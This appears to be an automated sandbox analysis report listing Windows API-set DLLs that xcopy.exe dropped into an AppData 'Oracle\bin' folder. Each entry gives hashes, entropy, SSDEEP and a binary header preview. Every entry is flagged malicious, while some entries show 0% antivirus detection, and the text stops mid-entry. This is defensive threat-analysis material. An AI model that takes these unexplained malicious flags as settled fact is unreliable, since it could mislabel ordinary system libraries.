                                                                                                                                                                                                                                  SHA-256:6572965FD3909AF60310DB1E00C8820B2DEEF4864612E757D3BABAB896F59ED7
                                                                                                                                                                                                                                  SHA-512:EF2AC73100184E6D80E03CE5AA089DBDDB9E2A52ADF878C34B7683274F879DCF2B066491CFC666F26453ACBD44543D9741F36369015BD5D07E36B49D435751F6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...[)<............!......................... ...............................0......TK....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@....[)<.........8...T...T.......[)<.........d...............[)<.........$...........RSDS!\e.tmw_..FX..Y....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ...!\e.tmw_..FX..YB.....2.M..s[)<.................[)<.....................H...t...............'...S...................A...k...................C...l...............6...U.............................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.81487015100869
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jWthWI7Wf9BvVVWQ4SWZ4KO4wqqnajWOZmK:jWthWImNinlKOV
                                                                                                                                                                                                                                  MD5:ECB4C11534A4A85BEC986517033AD8F8
                                                                                                                                                                                                                                  SHA1:43271481ADF4CD3791CA5A4D2EE539ED3B83A0AD
                                                                                                                                                                                                                                  SHA-256:CD5C2A10518023D9238F526AF78D2FDA8265CD10DB0EDD97BE29049ED7AA331C
                                                                                                                                                                                                                                  SHA-512:083977F07F9EF8DED2EDF0BE280A28CB189F95CB572529F1E1401EA7C4691CC4B29FD056B0582011D3BB39E32563376FBD6E88A5CFA4C2A7A5CE9BE2C32627F1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...A:.;...........!......................... ...............................0............@......................... ..._............ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A:.;........:...T...T.......A:.;........d...............A:.;........$...........RSDS:<4.....)......6....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ..._....edata... ..`....rsrc$01....` .......rsrc$02.... ...:<4.....)......62.........6A:.;............A:.;....z...............H...\...p...................a...................L.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObject

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.7728246345411405
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:2claWthWvWf9BvVVWQ4SWIFWSfJzQljpC52qnajABI1THbH:PlaWthWiNUSfJuNlse1TL
                                                                                                                                                                                                                                  MD5:C3CF59AC80E3635B9EADB5C6305831A5
                                                                                                                                                                                                                                  SHA1:1F74263E0405138698108ACC64BC787E7C1C6A6D
                                                                                                                                                                                                                                  SHA-256:FF80C5E44535B1B623A0320DF677A6C6DD106F8A5E14CFEE49CD3C9D47589646
                                                                                                                                                                                                                                  SHA-512:4ACCAD2D7A649BE76AFC22E4B2209C81CA81FD9E5A79B6C54E97B4617AC3107FD3BC96B5617FBBD93072D4520CD2EE97323085C7DE3E1E59EBD915AF56E791F5
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...+..X...........!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text...(........................... ..`.rsrc........ ......................@..@....+..X........8...T...T.......+..X........d...............+..X........$...........RSDS......d.D;...{....api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... .........d.D;...{..$K.....B..+..X................+..X....................H...............?...b.......................!...K...s.........................../...X...u.......................?...`.......................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.794571473352183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rXxDYsFIWthWAWf9BvVVWQ4SWKmWMMdn2KqnajySH3:rXxDYsFIWthWFNPnll1H3
                                                                                                                                                                                                                                  MD5:41E5FDC93A68E86207213CFBB49DB0D6
                                                                                                                                                                                                                                  SHA1:DECE00CDD02CB853356A3476825FD0275905C8CF
                                                                                                                                                                                                                                  SHA-256:4C1E732B43EFEC26D8CC467A5FFC13F062B3E3111CF369A8C94253711C77C330
                                                                                                                                                                                                                                  SHA-512:3CE02E70429EA5F56A607021A93EF52974188405078EC7BE8C91490D7F2996CCED38564CD182039B3B6A14F1C2EB72A0E6792B009D93272EA183C37E2B2A8608
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....Hq...........!......................... ...............................0............@......................... ...Y............ ...................!..............T............................................................................text...y........................... ..`.rsrc........ ......................@..@......Hq........?...T...T.........Hq........d.................Hq........$...........RSDS...l..#/.....#%....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg... ...Y....edata... ..`....rsrc$01....` .......rsrc$02.... ......l..#/.....#%.......h.J...Hq..........Hq....................H...x...........5...v...............K...................`.......[...................5...j...............P...........................api-ms-win-core-interlocked-l1-1-0.dll.I

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.765880903831318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cvuBL3B5LgWthWEWf9BvVVWQ4SWZCA3vktkqnajOyr39anu:cvuBL3BCWthWxNelqyrf
                                                                                                                                                                                                                                  MD5:922CF0ACE984C8FFEE4F5D505CE5D575
                                                                                                                                                                                                                                  SHA1:3296FAF55DBBBDFF04385278E6BDD8F383D64408
                                                                                                                                                                                                                                  SHA-256:BBDFFC7563C7E4EABCE9FC8FF8A3160C7E4D75D5BD50786CC6621E131F668D40
                                                                                                                                                                                                                                  SHA-512:A812719A2C11B9C0BD2AEF07F709DF83E6EEA5F8BE8FB1E348C91A4340DD22D5603CC3B555CC26548E6BEA926C66A9F2A96FCE6B2C9BDC55213A81526CF09403
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....@.............!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text...6........................... ..`.rsrc........ ......................@..@.....@..........A...T...T........@..........d................@..........$...........RSDS...=.`...4sN.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ......=.`...4sN...=..o.7.`.....@.......@......................H...........g...................M...|...................]...................&...H...k...................W...................4...o...................J...y...................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
                                                                                                                                                                                                                                  Entropy (8bit):6.80987909121437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+HOMw3zdp3bwjGfue9/0jCRrndblWthWZNls9lPQ3I:QOMwBprwjGfue9/0jCRrndbUA3c
                                                                                                                                                                                                                                  MD5:3979437D6817CDF82DA474C8A1EEFB0D
                                                                                                                                                                                                                                  SHA1:5E96FE40993ACBC7C2E9A104D51A728950AD872E
                                                                                                                                                                                                                                  SHA-256:3DD2E16B6F135CDD45BCE4065F6493540EBBAF2F7F1553085A2442EA2CF80A10
                                                                                                                                                                                                                                  SHA-512:4F64C6D232FDAE3E7E583CB1AA39878ABBFBBC9466108B97A5DCE089C35EB30AF502B5B212B043C27C1B12B23C165BD2B559060C43D9E2EFCDDA777B34F0066B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....(I...........!......................... ...............................0......f.....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@......(I........@...T...T.........(I........d.................(I........$...........RSDS.>N.!....t.=..p.....api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ....>N.!....t.=..p.....w.e[/|.(..(I..........(I............;...;...H...4... ...........-...\.......................5...U...}...................A...i...................1...n...............O...................O...~...................W.......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11736
                                                                                                                                                                                                                                  Entropy (8bit):6.8337077664203205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uzKJWthWLWf9BvVVWQ4SWG5eicfvXqnajJ6HskpwG:xJWthWWNH5WXll6HNaG
                                                                                                                                                                                                                                  MD5:EDEC633DBC568551ED587065C743AC59
                                                                                                                                                                                                                                  SHA1:4D9D5A85797C832942CDD8F00673B1666DE8AE35
                                                                                                                                                                                                                                  SHA-256:031B58E1621211ED8F41AED863E5E4C05C271D5FDF8ABD51AA8E9D5EB3536511
                                                                                                                                                                                                                                  SHA-512:18EFFD73DDEEF38D69FA3223EECD1996FDDBDC49FC592BB942F60541CB20E0A28E5E220D7CA2F5F06ABD52FA2A70EC478765C8C8606764862C3AEF86DEABAC0A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...x..(...........!......................... ...............................0.......I....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@....x..(........:...T...T.......x..(........d...............x..(........$...........RSDS.....g......<k.....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ........g......<k..l.....m..x..(............x..(....................H...............M...x...............0...Z...................)...T...}...........=...j............... ...M...t...................G...n.......................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.907283275259189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:WHEWthWwMiPDEs3f0DHDsVBIwgmqvrnDD0ADEs3TDL2L4m2grMWaLN5DEs3a6wpa:zWthWSwWf9BvVVWQ4SWben2qqnajWag
                                                                                                                                                                                                                                  MD5:E4CA639679FD3FEEC6A0923676D75E0D
                                                                                                                                                                                                                                  SHA1:5711C60F0C452CDAA380A43424FF8538623FF4D5
                                                                                                                                                                                                                                  SHA-256:1920E3AFA821558BADEABA7BDA9B8FE4ED5A5E7BDBB9F85B31D92FC0452030F4
                                                                                                                                                                                                                                  SHA-512:FBFCF57972AFF31BAA74DA9FC4158F155B9A6244768832376B9716E7D053FA34EDAADE8FC8F50D841A13D736FB63967C56EEB15A7DB9BA0B41588D27E842EC0B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L....$N0...........!......................... ...............................0...........@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$N0........=...T...T........$N0........d................$N0........$...........RSDSz.q...+`-..T......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ...z.q...+`-..T...7.(z..p.....$N0.........$N0....................H...p...............2...Z...............@...s...............'...F...w...........(...a...........................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.769778659702413
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:hZDWthW/Wf9BvVVWQ4SWwgLXspjpC52qnajABI1T5:hZDWthWSN/Nlse11
                                                                                                                                                                                                                                  MD5:BC8C1B65A3FABA02EA3412113F2DE75D
                                                                                                                                                                                                                                  SHA1:761D2D0B3C13F5076B97874CD0B6D57A97A9EABA
                                                                                                                                                                                                                                  SHA-256:5009391754032B93BC3F950B5E17D4ED7BFD37941170F97F65C596D9ECDF8E75
                                                                                                                                                                                                                                  SHA-512:B7E87E031F7437A115D9F76AA2A2CD59F34042448A098951773F32286DD7F3F57979C3F0E7026138CE4D4C3C6F6D4F6838A5C306EF874C02914D9272091744E3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L..................!......................... ...............................0......>n....@.........................0...G............ ...................!..............T............................................................................text...w........................... ..`.rsrc........ ......................@..@................F...T...T...................d...........................$...........RSDSs.)..........=4k....api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg...0...G....edata... ..`....rsrc$01....` .......rsrc$02.... ...s.)..........=4k...0.z.zj1.............................*...............X...........r...........#...T...}...............H...................3...f...............:..._...X...............D...m...............1...h...................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
                                                                                                                                                                                                                                  Entropy (8bit):6.668459486612788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ShHk1Jzb9cKcIhWthW6Wf9BvVVWQ4SWVcrS0tkqnajOyr39b7j:QHk1JzBcKcIhWthW3NtKlqyrxH
                                                                                                                                                                                                                                  MD5:95C3F386F30F7D0E68909D7B7C43246F
                                                                                                                                                                                                                                  SHA1:FB81C7F1F0F444DAA5B3299580528196AD50E592
                                                                                                                                                                                                                                  SHA-256:D7716BA9DB032B306BE6B48E93B379B4E0A9E763A12671441422507236ABECB5
                                                                                                                                                                                                                                  SHA-512:8AC039726C23BEE52C7F5E1CBD8B40D9D0BF7FDA0B322666B38F004E3BA65AFAFFA16494C38B588F6B4A27F91B69A9ABC0F190D120325C8BCAC741FB4A02A87E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L......R...........!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......R........B...T...T..........R........d..................R........$...........RSDS.B... D .V.].m{....api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ....B... D .V.].m{.....xq...>/...R.......R....2.......1...1...H...........k...............%...P...................8...g...................K...r...............!...F...m...............F...j...............1...X...............<...t.......

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.835955914490612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5/DiDfIepWthWjWf9BvVVWQ4SW4zKsmsqnajrQAVO:EDfIepWthWuNCs9lPQAg
                                                                                                                                                                                                                                  MD5:4DA67FEEFEB86B58A20B3482B93285B3
                                                                                                                                                                                                                                  SHA1:6CD7F344D7CA70CF983CADDB88FF6BAA40385EF1
                                                                                                                                                                                                                                  SHA-256:3A5D176B1F2C97BCA7D4E7A52590B84B726796191AE892D38AD757FD595F414D
                                                                                                                                                                                                                                  SHA-512:B9F420D30143CF3F5C919FA454616765602F27C678787D34F502943567E3E5DFB068FEC8190FEA6FA8DB70153ED620EB4FE5DC3092F9B35B7D46B00CC238E3BA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....1............!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@......1.........B...T...T.........1.........d.................1.........$...........RSDS......Bh.j..........api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... .........Bh.j........j.c.x'.....1.......1.....................H...............M...............B...w...............>...n...............3...p...........'...f...............2...S.......................................api-ms-win-core-proc

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10720
                                                                                                                                                                                                                                  Entropy (8bit):6.957943556643638
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:vHaIWthW9Wf9BvVVWQ4SWmDQ80Hy5qnajslBE87K344u7:v6IWthW4N+slEE87KI4c
                                                                                                                                                                                                                                  MD5:97C67B3BDADCCA4FE30F720D7128A625
                                                                                                                                                                                                                                  SHA1:52EE534A3CBFA86F8B895212154D610C8EA9ECE7
                                                                                                                                                                                                                                  SHA-256:49E587C970471A29BC49B8ACE18510B4BD2B1A561484314CDDDDD10FBF5334DA
                                                                                                                                                                                                                                  SHA-512:D4E92A2AEFE890966CADE724D93811C8242C6E6A54A0F29FAC0CBEB517D96DC57C535F939A477731EA55BD74BABC4DAF93384DA00DE0104BD0122868A1260AFC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...8..............!......................... ...............................0...........@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@....8...........;...T...T.......8...........d...............8...........$...........RSDS%......;.k[Q.......api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ...%......;.k[Q...V...\.6.s...8...............8.......\...............H...P...X.......................api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerforma

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.774749053687173
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9GlWthWWWf9BvVVWQ4SWNxhefx80Hy5qnajslBE87H00:9GlWthWbN44ZslEE87H/
                                                                                                                                                                                                                                  MD5:04CE356D4A5D956BE5531A1D60D00A8F
                                                                                                                                                                                                                                  SHA1:C65C6AE9FF7A96A8276AEA4C357D2080591163A9
                                                                                                                                                                                                                                  SHA-256:0D365A06FAD099CFA98DC2DDF0CA16DABBC5319B99C29B49BE25F3C9809DA2D9
                                                                                                                                                                                                                                  SHA-512:F59569F4C1BA9D19492C1B1AF41E1FE28732EEA8BE065CF069ABC01300D84059C87179688E25800D44FF3C60E5847BC14F4423B08ECE56862EC75ACC445BC50E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L.....@............!......................... ...............................0......V+....@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@......@.........>...T...T.........@.........d.................@.........$...........RSDS..{...2.A(.........api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... .....{...2.A(.....s@?..H...s+..@...........@.....f...............H...T...`.................................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBack

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.868076466757322
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LGyMvpWthWZZWf9BvVVWQ4SWMnSOuUgxfzfqnaj0OcW6O:LGyMvpWthWKN3fIrloqR
                                                                                                                                                                                                                                  MD5:BC3B85970CD46063F11D39E18166746B
                                                                                                                                                                                                                                  SHA1:5B957EDD3FF4EF0B72F1CA29853C1BC1630BDC85
                                                                                                                                                                                                                                  SHA-256:3C48D059B21126A3755E676758DF54B6779C975D13CFD10990A3C29CCFD95571
                                                                                                                                                                                                                                  SHA-512:93290660D9CE8D8F1391AD7C0F3BE9AB855F78004B30842283136BC61971B715FAA29D02E00B158E3F1EE56D52CD0AD090C511E464D251DBBA51E835DF6079F3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L......<...........!......................... ...............................0............@......................... ................ ...................!..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......<........:...T...T..........<........d..................<........$...........RSDS...-[.x."....{....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg... ........edata... ..`....rsrc$01....` .......rsrc$02.... ......-[.x."....{.U.G]..2|..9...<...............<....................H...h...............%...I...o...........................=...^...............................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.Compa

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13280
                                                                                                                                                                                                                                  Entropy (8bit):6.729198626080774
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pM2dv3V0dfpkXc2MAvVaoKFWthWMWf9BvVVWQ4SWiQJFaaqqnajW+:ldv3V0dfpkXc0vVavWthW5NlIFYlK+
                                                                                                                                                                                                                                  MD5:68A8AD8A1B296DD3203C53D163089E64
                                                                                                                                                                                                                                  SHA1:171ED7617B7C186DED4B09A250B9C94AAA1AA8FD
                                                                                                                                                                                                                                  SHA-256:C8925EE61E3135ACA8B56498C0304BF0DB981930D1E3D36CCAE2F84791C86908
                                                                                                                                                                                                                                  SHA-512:91D93C1C2D8AA5343EF2BD316106CC28E3BA5A48E2C1647BA7054FBFAF79B1B9CDB3298899D0EC63B795C7D5A23D73D2AE7A1902FC8136B29F9340AA95227C37
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.PE..L...u|u*...........!......................... ...............................0............@......................... ...V............ ...................!..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....u|u*........9...T...T.......u|u*........d...............u|u*........$...........RSDSb..Z....=^,.1.u....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg... ...V....edata... ..`....rsrc$01....` .......rsrc$02.... ...b..Z....=^,.1.u.#.-qK.....Hu|u*............u|u*............)...)...H...............Q.......................A...f...................D...x...........D...{...................5...`...................A...q...................?...{...........$...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
